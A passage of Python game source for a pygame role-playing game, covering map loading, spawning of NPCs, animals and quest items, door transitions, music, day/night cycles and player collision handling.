sprite.kill()\n del sprite\n\n for sprite in self.all_static_sprites:\n sprite.kill()\n del sprite\n\n del self.map\n gc.collect() # Forces garbage collection. Without this the game will quickly run out of memory.\n\n def layer_num_by_name(self, name):\n for i, layer in enumerate(self.map.tmxdata.visible_layers):\n if isinstance(layer, pytmx.TiledTileLayer):\n if layer.name == 'name':\n return i\n else:\n return None\n\n def load_map(self, temp_map):\n #self.sprite_data = self.map_sprite_data_list[int(self.world_location.x)][int(self.world_location.y)]\n self.compass_rot = -math.atan2(49 - self.world_location.y, 89 - self.world_location.x)\n self.compass_rot = math.degrees(self.compass_rot)\n map = self.map_data_list[int(self.world_location.y)][int(self.world_location.x)]\n self.minimap_image = pg.image.load(path.join(map_folder, str(map - 1) + '.png')).convert()\n\n # Checks to see if the map is bellow the main world level\n map = temp_map\n self.underworld = False\n\n self.map_type = None\n self.screen.fill(BLACK)\n loading_screen = choice(self.loading_screen_images)\n self.screen.blit(loading_screen, (0, 0))\n self.draw_text('Loading....', self.script_font, 35, WHITE, self.screen_width / 4, self.screen_height * 3/4, align=\"topright\")\n pg.display.flip()\n if not self.new_game:\n self.garbage_collect()\n self.map = TiledMap(self, map)\n if not self.map_sprite_data_list[int(self.world_location.x)][int(self.world_location.y)]: # Stores the stored map data object so it can be accessed from any map even after the map object dies.\n self.map_sprite_data_list[int(self.world_location.x)][int(self.world_location.y)] = self.map.stored_map_data\n self.sprite_data = self.map_sprite_data_list[int(self.world_location.x)][int(self.world_location.y)]\n self.group = PyscrollGroup(self.map.map_layer)\n self.group.add(self.player)\n self.group.add(self.player.human_body)\n self.group.add(self.player.dragon_body)\n #self.group.change_layer(self.player, self.original_layer)\n #self.group._map_layer = self.map.map_layer # Sets the map as the Pyscroll group base layer.\n self.camera = Camera(self, self.map.width, self.map.height)\n\n # This block of code is supposed to save edited tile maps, but it's all gooped up.\n #if self.sprite_data.tiledata:\n # for i, layer in enumerate(self.map.tmxdata.layers):\n # if isinstance(layer, pytmx.TiledTileLayer): # Excludes object layers\n # self.map.tmxdata.layers[i].data = self.sprite_data.tiledata[i]\n #else:\n # self.sprite_data.tiledata = []\n # for i, layer in enumerate(self.map.tmxdata.layers):\n # if isinstance(layer, pytmx.TiledTileLayer):# Excludes object layersee\n # self.sprite_data.tiledata.append(self.map.tmxdata.layers[i].data)\n\n for i in range(0, 10): # Creates random targets for Npcs\n target = Target(self)\n hits = pg.sprite.spritecollide(target, self.walls, False) # Kills targets that appear in walls.\n if hits:\n target.kill()\n\n if self.sprite_data.visited: # Loads stored map data for sprites if you have visited before.\n companion_names = []\n for companion in self.companions:\n companion_names.append(companion.kind)\n for npc in self.sprite_data.npcs:\n if npc['name'] not in companion_names: # Makes it so it doesn't double load your companions.\n Player(self, npc['location'].x, npc['location'].y, npc['name'])\n for animal in self.sprite_data.animals:\n Animal(self, animal['location'].x, animal['location'].y, animal['name'])\n for vehicle in self.sprite_data.vehicles:\n Vehicle(self, vehicle['location'], vehicle['name'])\n #for breakable in self.sprite_data.breakable:\n # Breakable(self, breakable['location'], breakable['w'], breakable['h'], breakable['name'], breakable['rotation'])\n for item in self.sprite_data.items:\n if item['name'] in ITEMS:\n Dropped_Item(self, item['location'], ITEMS[item['name']], item['rotation'])\n else: # Loads animals and NPCs that have moved onto unvisited maps.\n companion_names = []\n for companion in self.companions:\n companion_names.append(companion.kind)\n for npc in self.sprite_data.moved_npcs:\n if npc['name'] not in companion_names: # Makes it so it doesn't double load your companions.\n Player(self, npc['location'].x, npc['location'].y, npc['name'])\n self.sprite_data.moved_npcs = []\n for animal in self.sprite_data.moved_animals:\n Animal(self, animal['location'].x, animal['location'].y, animal['name'])\n self.sprite_data.moved_animals = []\n\n # Creates elevation objects if layers have EL in their names. I realize this is inefficient, and hopefully I can find a way to minimize the number of elevation objects created.\n for i, layer in enumerate(self.map.tmxdata.visible_layers):\n if 'EL' in layer.name:\n EL = layer.name\n EL = EL.replace('EL', '')\n EL = int(EL)\n if isinstance(layer, pytmx.TiledTileLayer):\n for x, y, gid, in layer:\n if gid != 0:\n cliff = self.in_surrounding_tiles(x, y, 0, i)\n elev = Elevation(self, x * self.map.tile_size, y * self.map.tile_size, self.map.tile_size, self.map.tile_size, EL, cliff)\n hits = pg.sprite.spritecollide(elev, self.elevations, False) # Kills redundant elevations on top of others.\n for hit in hits:\n if hit != elev:\n hit.kill()\n\n # Creates wall and ore block objects if layers have WALLS in their names.\n #exception_tile = 0\n #experimenting with changing tiles\n #print(self.map.tmxdata.tiledgidmap)\n #layer = self.map.tmxdata.layers[2].data\n #layer[0][0] = 2\n \"\"\"\n if self.map.tmxdata.get_tile_gid(0, 0, 0) != self.map.tmxdata.get_tile_gid(0, 1, 0): # Sees if there is a different tile in the upper left corner to use as a zero tile where no walls will spawn.\n exception_tile = self.map.tmxdata.get_tile_gid(0, 0, 0) # Tile type to ignore and treat as a zero.\n if self.map.tmxdata.get_tile_gid(1, 0, 0) != self.map.tmxdata.get_tile_gid(0, 1, 0): # Sees if there is a different tile in the upper corner (2nd x pos) to use as an ore tile.\n block_tile = self.map.tmxdata.get_tile_gid(1, 0, 0)\n for i, layer in enumerate(self.map.tmxdata.visible_layers):\n if 'WALLS' in layer.name:\n if isinstance(layer, pytmx.TiledTileLayer):\n for x, y, gid, in layer:\n if gid != 0:\n if gid == block_tile: # Makes ore block objects where the block_tile type tile is.\n if not self.sprite_data.visited: # Only generates ores if you haven't been here before. Otherwise it generates the remaining ores from the map data object.\n block_type = choice(choices(BLOCK_LIST, BLOCK_PROB, k=10))\n center = vec(x * self.map.tile_size + self.map.tile_size / 2, y * self.map.tile_size + self.map.tile_size / 2)\n Breakable(self, center, self.map.tile_size, self.map.tile_size, block_type)\n elif self.in_surrounding_tiles(x, y, 0, i):#Checks to see if surrounding tiles are zeros and spawns a wall if they are.\n wall = Obstacle(self, x * self.map.tile_size, y * self.map.tile_size, self.map.tile_size, self.map.tile_size)\n hits = pg.sprite.spritecollide(wall, self.walls, False) # Kills redundant walls on top of others.\n for hit in hits:\n if hit != wall:\n hit.kill()\n elif (gid != exception_tile) and self.in_surrounding_tiles(x, y, exception_tile, i):#Checks to see if surrounding tiles are exceptions and spawns a wall if they are.\n wall = Obstacle(self, x * self.map.tile_size, y * self.map.tile_size, self.map.tile_size, self.map.tile_size)\n hits = pg.sprite.spritecollide(wall, self.walls, False) # Kills redundant walls on top of others.\n for hit in hits:\n if hit != wall:\n hit.kill()\n \"\"\"\n\n # This section creates ores based off of which tile is used in the map rather than having to create ore objects\n #if self.map_type:\n # for type in UNDERWORLD:\n # if type in self.map_type:\n # # This section generates ore blocks to time in all the spaces with the tile specified in the position (0, 0).\n # if not self.sprite_data.visited:\n # block_tile = self.map.tmxdata.get_tile_gid(1, 0, 0)\n # for location in self.map.tmxdata.get_tile_locations_by_gid(block_tile):\n # block_type = choice(choices(BLOCK_LIST, BLOCK_PROB, k = 10))\n # center = vec(location[0] * self.map.tile_size + self.map.tile_size/2, location[1] * self.map.tile_size + self.map.tile_size/2)\n # block = Breakable(self, center, self.map.tile_size, self.map.tile_size, block_type)\n # hits = pg.sprite.spritecollide(block, self.walls, False) # Kills walls blocks spawn on top of.\n # for hit in hits:\n # if hit != hit.trunk:\n # hit.kill()\n\n for tile_object in self.map.tmxdata.objects:\n if tile_object.name:\n obj_center = vec(tile_object.x + tile_object.width / 2, tile_object.y + tile_object.height / 2)\n # These are paths for the AIs to follow.\n # if tile_object.name in AIPATHS:\n # AIPath(self, tile_object.x, tile_object.y, tile_object.width, tile_object.height, tile_object.name)\n # It's super important that all elevations spawn before the player and mobs.\n if 'EL' in tile_object.name:\n try:\n _, elev, climb = tile_object.name.split('_')\n climb = eval(climb)\n except:\n _, elev = tile_object.name.split('_')\n climb = False\n elev = int(elev)\n Elevation(self, tile_object.x, tile_object.y, tile_object.width, tile_object.height, elev, climb)\n if tile_object.name == 'jumpable':\n elev = Elevation(self, tile_object.x, tile_object.y,\n tile_object.width, tile_object.height, 0, False, 'jumpable')\n if tile_object.name == 'climbable':\n Elevation(self, tile_object.x, tile_object.y,\n tile_object.width, tile_object.height, 0, False, 'climbable')\n if tile_object.name == 'player':\n self.player.pos = vec(obj_center)\n self.player.rect.center = self.player.pos\n\n if not self.sprite_data.visited: # Only executes if you have never been to this map before. Otherwise it pulls the data from the stored list.\n # Loads NPCs from NPC_TYPE_LIST\n for npc_type in NPC_TYPE_LIST:\n if tile_object.name in eval(npc_type.upper()):\n if npc_type == 'animals':\n Animal(self, obj_center.x, obj_center.y, tile_object.name)\n else:\n if self.is_living(tile_object.name):\n Player(self, obj_center.x, obj_center.y, tile_object.name)\n # Loads vehicles\n for vehicle in VEHICLES:\n if vehicle == tile_object.name:\n Vehicle(self, obj_center, vehicle)\n # Loads items, weapons, and armor placed on the map\n if tile_object.name in ITEMS:\n Dropped_Item(self, obj_center, ITEMS[tile_object.name])\n # Loads fixed rotated items:\n if '@' in tile_object.name:\n item, rot = tile_object.name.split('@')\n rot = int(rot)\n if item in ITEMS:\n Dropped_Item(self, obj_center, ITEMS[item], rot)\n # Used for destructable plants, rocks, ore veins, walls, etc\n \"\"\"\n for item in BREAKABLES:\n if item in tile_object.name:\n size = None\n if '@' in tile_object.name:\n temp_item, rot = tile_object.name.split('@')\n rot = int(rot)\n else:\n rot = None\n if 'SZ' in tile_object.name:\n size, temp_item = tile_object.name.split('SZ')\n Breakable(self, obj_center, tile_object.width, tile_object.height, item, rot, size)\"\"\"\n\n # Loads detectors used to detect whether quest items have be delivered to the correct locations.\n if 'detector' in tile_object.name: # These are invisible objects used to detect other objects touching them.\n Detector(self, tile_object.x, tile_object.y, tile_object.width, tile_object.height, tile_object.name)\n # Loads items/npcs that only appear after their corresponding quests are completed.\n if 'QC' in tile_object.name:\n _, quest, quest_item = tile_object.name.split('_')\n if self.quests[quest]['completed']:\n if quest_item in VEHICLES:\n Vehicle(self, obj_center, quest_item)\n if quest_item in self.animals_dict:\n Animal(self, obj_center.x, obj_center.y, quest_item)\n if quest_item in self.people:\n if self.is_living(quest_item):\n Player(self, obj_center.x, obj_center.y, quest_item)\n if quest_item in ITEMS:\n Dropped_Item(self, obj_center, ITEMS[quest_item])\n # Loads items/npcs that should only be there if a quest hasn't been completed\n if 'QU' in tile_object.name:\n _, quest, quest_item = tile_object.name.split('_')\n if not self.quests[quest]['completed']:\n if quest_item in VEHICLES:\n Vehicle(self, obj_center, quest_item)\n if quest_item in self.animals_dict:\n Animal(self, obj_center.x, obj_center.y, quest_item)\n if quest_item in self.people:\n if self.is_living(quest_item):\n Player(self, obj_center.x, obj_center.y, quest_item)\n if quest_item in ITEMS:\n Dropped_Item(self, obj_center, ITEMS[quest_item])\n # Loads items/npcs that only appear after a quest has been accepted.\n if 'QA' in tile_object.name:\n _, quest, quest_item = tile_object.name.split('_')\n if self.quests[quest]['accepted']:\n if quest_item in VEHICLES:\n Vehicle(self, obj_center, quest_item)\n if quest_item in self.animals_dict:\n Animal(self, obj_center.x, obj_center.y, quest_item)\n if quest_item in self.people:\n if self.is_living(quest_item):\n Player(self, obj_center.x, obj_center.y, quest_item)\n if quest_item in ITEMS:\n Dropped_Item(self, obj_center, ITEMS[quest_item])\n # Loads items/npcs that should only be there if a quest hasn't been accepted\n if 'QN' in tile_object.name:\n _, quest, quest_item = tile_object.name.split('_')\n if not self.quests[quest]['accepted']:\n if quest_item in VEHICLES:\n Vehicle(self, obj_center, quest_item)\n if quest_item in self.animals_dict:\n Animal(self, obj_center.x, obj_center.y, quest_item)\n if quest_item in self.people:\n if self.is_living(quest_item):\n Player(self, obj_center.x, obj_center.y, quest_item)\n if quest_item in ITEMS:\n Dropped_Item(self, obj_center, ITEMS[quest_item])\n if 'COMMAND' in tile_object.name: # I used this block of code for killing Alex's body: the character that the black wraith comes out of in the beginning.\n _, command, npc = tile_object.name.split('_')\n if npc != 'None':\n if self.is_living(npc):\n temp_npc = Player(self, obj_center.x, obj_center.y, npc)\n if command == 'kill':\n temp_npc.death()\n # if tile_object.name == 'fire':\n # Stationary_Animated(self, obj_center, 'fire')\n # if tile_object.name == 'shock':\n # Stationary_Animated(self, obj_center, 'shock')\n # if tile_object.name == 'charger':\n # Charger(self, tile_object.x, tile_object.y, tile_object.width, tile_object.height)\n if tile_object.name == 'portal':\n self.portal_location = obj_center\n if 'firepot' in tile_object.name:\n number = tile_object.name[-1:]\n FirePot(self, obj_center, number)\n # if tile_object.name == 'wall':\n # Obstacle(self, tile_object.x, tile_object.y, tile_object.width, tile_object.height)\n # if tile_object.name == 'light':\n # LightSource(self, tile_object.x, tile_object.y,\n # tile_object.width, tile_object.height)\n # if 'lightsource' in tile_object.name:\n # numvars = tile_object.name.count('_')\n # if numvars == 2:\n # _, kind, rot = tile_object.name.split('_')\n # elif numvars == 1:\n # _, kind = tile_object.name.split('_')\n # rot = 0\n # kind = int(kind)\n # if rot == 'R':\n # rot = 0\n # elif rot == 'U':\n # rot = 90\n # elif rot == 'L':\n # rot = 180\n # elif rot == 'D':\n # rot = 270\n # else:\n # rot = int(rot)\n # LightSource(self, tile_object.x, tile_object.y,\n # tile_object.width, tile_object.height, kind, rot)\n # if tile_object.name == 'inside':\n # Inside(self, tile_object.x, tile_object.y,\n # tile_object.width, tile_object.height)\n if tile_object.name == 'nospawn':\n NoSpawn(self, tile_object.x, tile_object.y,\n tile_object.width, tile_object.height)\n # if tile_object.name == 'electric entry':\n # ElectricDoor(self, tile_object.x, tile_object.y, tile_object.width, tile_object.height)\n # if 'entryway' in tile_object.name: # Used for animated doors that can be opened, closed or locked.\n # numvars = tile_object.name.count('_')\n # if numvars == 0:\n # entryway = Entryway(self, tile_object.x, tile_object.y)\n # elif numvars == 1:\n # _, orientation = tile_object.name.split('_')\n # entryway = Entryway(self, tile_object.x, tile_object.y, orientation)\n # elif numvars == 2:\n # _, orientation, kind = tile_object.name.split('_')\n # entryway = Entryway(self, tile_object.x, tile_object.y, orientation, kind)\n # elif numvars == 3:\n # _, orientation, kind, name = tile_object.name.split('_')\n # locked = eval(locked)\n # entryway = Entryway(self, tile_object.x, tile_object.y, orientation, kind, name)\n # elif numvars == 4:\n # _, orientation, kind, name, locked = tile_object.name.split('_')\n # locked = eval(locked)\n # entryway = Entryway(self, tile_object.x, tile_object.y, orientation, kind, name, locked)\n if 'door' in tile_object.name: # This block of code positions the player at the correct door when changing maps\n door = Door(self, tile_object.x, tile_object.y,\n tile_object.width, tile_object.height, tile_object.name)\n if self.previous_map[3:][:-4] == door.name[4:]:\n # This sets up the direction vector which has x and y values of 1 but the signs tell what direction the player was last heading. So the player will appear on the correct side of the door.\n direction_x = vec(self.player.direction.x, 0).normalize()\n direction_y = vec(0, self.player.direction.y).normalize()\n direction_vector = vec(direction_x.x, direction_y.y)\n if door.rect.width > 512: # For wide doors/connection points to other maps. This makes it so the player appears in the correct x position on the map\n self.player.pos.y = door.rect.y + (direction_vector.y * self.map.tile_size)\n self.player.rect.center = self.player.pos\n elif door.rect.height > 512: # For wide doors/connection points to other maps. This makes it so the player appears in the correct y position on the map\n self.player.pos.x = door.rect.x + (direction_vector.x * self.map.tile_size)\n self.player.rect.center = self.player.pos\n else:\n self.player.pos = vec(obj_center) + direction_vector * 64\n self.player.rect.center = self.player.pos\n\n try:\n if 'maptype' in tile_object.name:\n self.map_type = tile_object.name[8:]\n except:\n pass\n\n # Generates trees\n # if len(self.breakable) < 1:\n # for y in range(0, self.map.tiles_high):\n # for x in range(0, self.map.tiles_wide):\n # props = self.map.tmxdata.get_tile_properties(x, y, self.river_layer)\n # if props == None:\n # pass\n # elif 'stump' in props:\n # tree = props['stump']\n # Breakable(self, vec(x * TILESIZE + TILESIZE / 2, y * TILESIZE + TILESIZE / 2), TILESIZE, TILESIZE, tree)\n\n #gids = []\n #for gid, props in self.map.tmxdata.tile_properties.items():\n # if props and ('stump' in props):\n # gids.append(gid)\n #for gid in gids:\n # for x, y, layer in self.map.tmxdata.get_tile_locations_by_gid(gid):\n # Breakable(self, vec(x * TILESIZE + TILESIZE / 2, y * TILESIZE + TILESIZE / 2), TILESIZE, TILESIZE, tree)\n\n\n # Generates random drop items\n \"\"\"\n if self.map_type in ['mountain', 'forest', 'grassland', 'desert', 'beach']:\n for i in range(0, randrange(1, 15)):\n for item in ITEMS:\n if 'random drop' in ITEMS[item].keys():\n if randrange(0, ITEMS[item]['random drop']) < 2:\n centerx = randrange(200, self.map.width - 200)\n centery = randrange(200, self.map.height - 200)\n center = vec(centerx, centery)\n Dropped_Item(self, center, 'items', item)\"\"\"\n\n # Generates random animals/Npcs on maps that don't have existing animals on them. The type of animal depends on the maptype object in the tmx file.\n if (len(self.mobs) - len(self.companions)) < 4:\n if self.map_type:\n for i in range(0, randrange(10, 30)):\n animal = choice(list(eval(self.map_type.upper() + '_ANIMALS')))\n centerx = randrange(200, self.map.width - 200)\n centery = randrange(200, self.map.height - 200)\n if animal in self.people:\n npc = Player(self, centerx, centery, animal)\n # check for NPCs that spawn in walls and kills them\n hits = pg.sprite.spritecollide(npc, self.walls, False)\n if hits:\n npc.kill()\n\n else:\n anim = Animal(self, centerx, centery, animal)\n # checks for animals that spawn in walls and kills them.\n hits = pg.sprite.spritecollide(anim, self.walls, False)\n if hits:\n anim.kill()\n\n # Kills breakables that spawn in water or no spawn areas.\n hits = pg.sprite.groupcollide(self.breakable, self.nospawn, False, False)\n for hit in hits:\n hit.trunk.kill()\n hit.kill()\n #hits = pg.sprite.groupcollide(self.breakable, self.water, False, False)\n #for hit in hits:\n # hit.trunk.kill()\n # hit.kill()\n #hits = pg.sprite.groupcollide(self.breakable, self.shallows, False, False)\n #for hit in hits:\n # hit.trunk.kill()\n # hit.kill()\n #hits = pg.sprite.groupcollide(self.breakable, self.long_grass, False, False)\n #for hit in hits:\n # hit.trunk.kill()\n # hit.kill()\n\n\n # check for fish out of water and kills them\n #hits = pg.sprite.groupcollide(self.animals, self.water, False, False)\n #for animal in self.animals:\n # if 'fish' in animal.kind['name']:\n # if animal not in hits:\n # animal.death(True)\n # if 'shark' in animal.kind['name']:\n # if animal not in hits:\n # animal.death(True)\n\n # Adds all players and companions\n #self.group.add(self.player.body)\n #for sprite in self.companions:\n # if sprite not in self.animals:\n # self.group.add(sprite.body)\n # else:\n # self.group.add(sprite)\n # Adds vehicles back to group\n #if self.player.in_vehicle:\n # self.group.add(self.player.vehicle)\n # if self.player.vehicle.cat == 'tank':\n # self.group.add(self.player.vehicle.turret)\n self.sprite_data.visited = True\n self.previous_map = map\n self.respawn = False\n if self.new_game:\n self.new_game = False\n\n # Starts music based on map\n if self.map_type == None:\n self.bg_music = BG_MUSIC\n else:\n self.bg_music = eval(self.map_type.upper() + '_MUSIC')\n if self.bg_music != self.previous_music: #Only starts new music if type of map changes\n self.previous_music = self.bg_music\n pg.mixer.music.fadeout(300)\n pg.mixer.music.load(path.join(music_folder, self.bg_music))\n pg.mixer.music.play(loops=-1)\n\n # sets up NPC target list for map\n self.target_list = [self.random_targets, self.work_stations, self.moving_targets, self.aipaths]\n for x in self.target_list: # Replaces empty sprite groups with the random targets group.\n if list(x) == []:\n x = self.random_targets\n\n self.clock.tick(FPS) # resets dt\n\n\n def run(self):\n # game loop - set self.playing = False to end the game\n self.playing = True\n self.beg = perf_counter()\n while self.playing:\n self.events()\n if not self.paused:\n self.update()\n self.draw()\n\n def quit(self):\n pg.quit()\n sys.exit()\n\n def night_transition(self):\n now = pg.time.get_ticks()\n if now - self.last_darkness_change > NIGHTFALL_SPEED:\n self.darkness += 1\n self.last_darkness_change = now\n if self.darkness > MAX_DARKNESS:\n self.darkness = MAX_DARKNESS\n self.day_start_time = now\n self.night = True\n self.nightfall = False\n #color_val = 255 - self.darkness\n self.dark_color = (self.darkness, self.darkness, self.darkness)\n\n def day_transition(self):\n now = pg.time.get_ticks()\n if now - self.last_darkness_change > NIGHTFALL_SPEED:\n self.darkness -= 1\n if self.darkness < 0:\n self.darkness = 0\n self.day_start_time = now\n self.night = False\n self.sunrise = False\n #color_val = 255 - self.darkness\n self.dark_color = (self.darkness, self.darkness, self.darkness)\n\n def update(self):\n # update portion of the game loop\n # Controls the day turning to night and vice versa\n now = pg.time.get_ticks()\n if self.night:\n if now - self.day_start_time > NIGHT_LENGTH:\n self.sunrise = True\n self.day_transition()\n elif now - self.day_start_time > DAY_LENGTH:\n self.nightfall = True\n self.night_transition()\n if now - self.last_mobhp_update > MOB_HEALTH_SHOW_TIME: # Turns off mob hp bar if when you aren't attacking the mob.\n self.show_mobhp = False\n\n # updates all sprites that are on screen and puts on screen sprites into groups for hit checks.\n self.message_text = False\n # finds static sprites (ones you don't see) on screen.\n self.obstacles_on_screen.empty()\n self.walls_on_screen.empty()\n self.barriers_on_screen.empty()\n self.elevations_on_screen.empty()\n self.climbs_on_screen.empty()\n self.inside_on_screen.empty()\n for sprite in self.all_static_sprites:\n if self.on_screen(sprite, 400):\n if sprite in self.obstacles:\n self.obstacles_on_screen.add(sprite)\n if sprite in self.walls:\n self.walls_on_screen.add(sprite)\n self.barriers_on_screen.add(sprite)\n elif sprite in self.elevations:\n self.elevations_on_screen.add(sprite)\n self.barriers_on_screen.add(sprite)\n if sprite in self.climbs:\n self.climbs_on_screen.add(sprite)\n elif sprite in self.inside:\n self.inside_on_screen.add(sprite)\n\n # dynamic sprites on screen\n self.vehicles_on_screen.empty()\n #self.entryways_on_screen.empty()\n #self.electric_doors_on_screen.empty()\n self.breakable_on_screen.empty()\n self.corpses_on_screen.empty()\n self.dropped_items_on_screen.empty()\n self.fires_on_screen.empty()\n self.mobs_on_screen.empty()\n self.npcs_on_screen.empty()\n self.npc_bodies_on_screen.empty()\n self.animals_on_screen.empty()\n self.moving_targets_on_screen.empty()\n self.sprites_on_screen.empty()\n self.lights_on_screen.empty()\n for sprite in self.all_sprites:\n if self.on_screen(sprite):\n self.sprites_on_screen.add(sprite)\n # if sprite in self.entryways:\n # self.entryways_on_screen.add(sprite)\n # if sprite in self.electric_doors:\n # self.electric_doors_on_screen.add(sprite)\n if sprite in self.vehicles:\n self.vehicles_on_screen.add(sprite)\n if sprite in self.walls:\n self.walls_on_screen.add(sprite)\n elif sprite in self.fires:\n self.fires_on_screen.add(sprite)\n elif sprite in self.breakable:\n self.breakable_on_screen.add(sprite)\n elif sprite in self.corpses:\n self.corpses_on_screen.add(sprite)\n elif sprite in self.dropped_items:\n self.dropped_items_on_screen.add(sprite)\n elif sprite in self.npc_bodies:\n self.npc_bodies_on_screen.add(sprite)\n elif sprite in self.moving_targets:\n self.moving_targets_on_screen.add(sprite)\n if sprite in self.mobs:\n self.mobs_on_screen.add(sprite)\n if sprite in self.animals:\n self.animals_on_screen.add(sprite)\n elif sprite in self.npcs:\n self.npcs_on_screen.add(sprite)\n elif self.on_screen(sprite, 200):\n if sprite in self.lights:\n self.lights_on_screen.add(sprite)\n elif sprite in self.bullets: # Kills bullets not on screen.\n sprite.kill()\n elif sprite == self.player.vehicle:\n sprite.update()\n elif sprite in self.companions:\n sprite.update()\n elif sprite in self.companion_bodies:\n sprite.update()\n self.sprites_on_screen.update()\n self.camera.update(self.player)\n self.group.center(self.player.rect.center)\n\n # Kills certain off screen sprites\n for corpse in self.corpses:\n if corpse not in self.corpses_on_screen:\n corpse.kill()\n\n ## Used for playing fire sounds at set distances:\n #closest_fire = None\n #previous_distance = 30000\n #for sprite in self.fires_on_screen: # Finds the closest fire and ignores the others.\n # player_dist = self.player.pos - sprite.pos\n # player_dist = player_dist.length()\n # if previous_distance > player_dist:\n # closest_fire = sprite\n # previous_distance = player_dist\n\n #if closest_fire:\n # if previous_distance < 400: # This part makes it so the fire volume decreases as you walk away from it.\n # volume = 150 / (previous_distance * 2 + 0.001)\n # self.channel4.set_volume(volume)\n # if not self.channel4.get_busy():\n # self.channel4.play(self.effects_sounds['fire crackle'], loops=-1)\n # else:\n # self.channel4.stop()\n #else:\n # self.channel4.stop()\n\n # The following are hit checks between moving objects. All tile-based hit checks are done in teh sprites.py using each sprites tile_props/next_tile_props\n # These hit checks only happen if the player insn't in a flying vehicle.\n if self.player not in self.flying_vehicles:\n\n # player hits portal\n hits = pg.sprite.spritecollide(self.player, self.portals, False, pg.sprite.collide_circle_ratio(0.35))\n if hits:\n now = pg.time.get_ticks()\n if now - hits[0].spawn_time > 1500: # Makes it so you can see the portal appear before it transfers you to a new map\n self.change_map(None, hits[0].coordinate, hits[0].location)\n\n # player hits entrance to other map\n hits = pg.sprite.spritecollide(self.player, self.doors, False)\n if hits:\n # Sets player's location on local map\n loc = hits[0].loc\n self.player.rect.center = (int(loc.x * self.map.tile_size), int(loc.y * self.map.tile_size))\n self.player.pos = vec(self.player.rect.center)\n self.change_map(None, None, None, hits[0].map)\n\n # player melee hits entryway (door)\n #if self.player.melee_playing:\n # hits = pg.sprite.spritecollide(self.player.body, self.entryways_on_screen, False, melee_hit_rect)\n # if hits:\n # if hits[0] in self.electric_doors_on_screen:\n # hits[0].gets_hit(40, 0, 0, 100, self.player)\n # else:\n # self.player.does_melee_damage(hits[0])\n\n # player hits entryway (a door)\n #hits = pg.sprite.spritecollide(self.player, self.entryways_on_screen, False, entryway_collide)\n #if hits:\n # self.message_text = True\n # if hits[0].locked:\n # self.message = hits[0].name + ' is locked. ' + pg.key.name(self.key_map['interact']).upper() + ' to unlock'\n # if self.player.e_down:\n # if not self.in_lock_menu:\n # self.in_lock_menu = self.in_menu = True\n # self.lock_menu = Lock_Menu(self, hits[0])\n # self.message_text = False\n # self.player.e_down = False\n # elif not hits[0].opened:\n # self.message = pg.key.name(self.key_map['interact']).upper() + ' to open'\n # if self.player.e_down:\n # hits[0].open = True\n # hits[0].close = False\n # self.message_text = False\n # self.player.e_down = False\n # elif hits[0].opened:\n # self.message = pg.key.name(self.key_map['interact']).upper() + ' to close'\n # if self.player.e_down:\n # hits[0].close = True\n # hits[0].open = False\n # self.message_text = False\n # self.player.e_down = False\n\n # player hit corps\n hits = pg.sprite.spritecollide(self.player, self.corpses_on_screen, False)\n if hits:\n self.message_text = True\n self.message = pg.key.name(self.key_map['interact']).upper() + \" to loot\"\n if self.player.e_down:\n MainMenu(self, self.player, 'Looting', hits[0].inventory)\n self.message_text = False\n self.player.e_down = False\n\n # Player is in talking range of NPC\n if True not in [self.message_text, self.in_menu]:\n hits = pg.sprite.spritecollide(self.player, self.npcs_on_screen, False, npc_talk_rect)\n if hits:\n if hits[0].dialogue:\n if not self.in_dialogue_menu:\n now = pg.time.get_ticks()\n if now - self.last_dialogue > 2000:\n self.message_text = True\n self.message = pg.key.name(self.key_map['interact']).upper() + ' to talk'\n if self.player.e_down:\n hits[0].ai.target = self.player\n hits[0].talk_attempt = True\n self.message_text = False\n self.player.e_down = False\n if self.dialogue_menu_npc:\n self.dialogue_menu = Dialogue_Menu(self, self.dialogue_menu_npc)\n\n # player hits elevation change\n hits = pg.sprite.spritecollide(self.player, self.elevations_on_screen, False)\n if hits:\n keys = pg.key.get_pressed()\n if keys[self.key_map['climb']]:\n if self.player.stats['stamina'] > 10 and not self.player.in_vehicle:\n self.player.climbing = True\n else:\n if self.player.in_vehicle:\n if 'climbables' not in self.player.vehicle.collide_list:\n if 'obstacles' not in self.player.vehicle.collide_list:\n self.player.climbing = True\n else:\n self.player.climbing = False\n if not self.player.jumping:\n if self.player.elevation > 1:\n self.player.falling = True\n self.player.pre_jump()\n self.player.elevation = 0\n\n # player hits dropped item\n hits = pg.sprite.spritecollide(self.player, self.dropped_items_on_screen, False, pg.sprite.collide_circle_ratio(0.75))\n for hit in hits:\n if hit.name not in ['fire pit']:\n self.message_text = True\n if self.message != \"You are carrying too much weight.\":\n self.message = pg.key.name(self.key_map['interact']).upper() + 'to pick up'\n if self.player.e_down:\n if self.player.add_inventory(hit.item):\n #self.player.calculate_weight()\n self.player.e_down = False\n self.message_text = False\n hit.kill()\n else:\n self.message = \"You are carrying too much weight.\"\n\n # player melee hits breakable: a bush, tree, rock, ore vein, shell, glass, etc.\n if self.player.melee_playing:\n hits = pg.sprite.spritecollide(self.player.body, self.breakable_on_screen, False, breakable_melee_hit_rect)\n for bush in hits:\n if self.player.equipped[self.player.weapon_hand] == None:\n weapon_type = None\n else:\n weapon_type = WEAPONS[self.player.equipped[self.player.weapon_hand]]['type']\n if not self.player.change_used_item('weapons', self.player.equipped[self.player.weapon_hand]): # Makes it so pickaxes and other items deplete their hp\n weapon_type = None\n bush.gets_hit(weapon_type)\n\n # player hits empty vehicle or mech suit\n if not self.player.in_vehicle:\n if self.player.possessing == None:\n hits = pg.sprite.spritecollide(self.player, self.mechsuits, False)\n if hits:\n if (hits[0].driver == None) and hits[0].living:\n self.message_text = True\n self.message = pg.key.name(self.key_map['interact']).upper() + \" to enter, T to exit\"\n if self.player.e_down:\n if hits[0].living:\n hits[0].possess(self.player)\n self.message_text = False\n self.player.e_down = False\n\n hits = pg.sprite.spritecollide(self.player, self.vehicles_on_screen, False, pg.sprite.collide_circle_ratio(0.95))\n if hits:\n if not hits[0].occupied and hits[0].living:\n self.message_text = True\n self.message = pg.key.name(self.key_map['interact']).upper() + ' to enter, ' + pg.key.name(self.key_map['dismount']).upper() + ' to exit'\n if self.player.e_down:\n if hits[0].living:\n hits[0].enter_vehicle(self.player)\n self.message_text = False\n self.player.e_down = False\n hits = pg.sprite.spritecollide(self.player, self.flying_vehicles, False)\n if hits:\n if not hits[0].occupied and hits[0].living:\n self.message_text = True\n if self.message != \"You need a key to operate this vehicle.\":\n self.message = pg.key.name(self.key_map['interact']).upper() + ' to enter, ' + pg.key.name(self.key_map['dismount']).upper() + ' to exit'\n if self.player.e_down:\n self.player.e_down = False\n if hits[0].living:\n if hits[0].kind == 'airship':\n if 'airship key' in self.player.inventory['items']:\n 